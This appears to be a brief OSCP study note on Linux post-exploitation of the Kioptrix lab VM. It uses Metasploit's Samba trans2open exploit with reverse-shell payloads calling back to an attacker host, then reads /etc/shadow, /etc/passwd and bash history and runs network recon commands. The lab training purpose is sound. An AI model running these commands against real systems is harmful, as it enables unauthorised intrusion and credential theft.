OSCP Security Technology - Linux Post Exploitation
OSCP Security Technology - Linux Post Exploitation
Start Metasploit.
msfconsole
Target VM: Kioptrix
Refer to Linux post exploitation cheat sheet: https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
msfvenom -l
Try to Exploit
search trans2open
use exploit/linux/samba/trans2open
set rhost 192.168.1.14
set payload linux/x86/meterpreter/reverse_tcp
show options
set lhost 192.168.1.22
exploit
Failed this time, so let's try another payload type.
set payload generic/shell_reverse_tcp
show options
exploit
cat .bash_history
cat /etc/shadow
cat /etc/passwd
Create shadow and passwd files in Kali.
Route
/sbin/route
netstart
/bin/netstat -ano
ARP
/sbin/arp
Try to find other interesting things...
相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。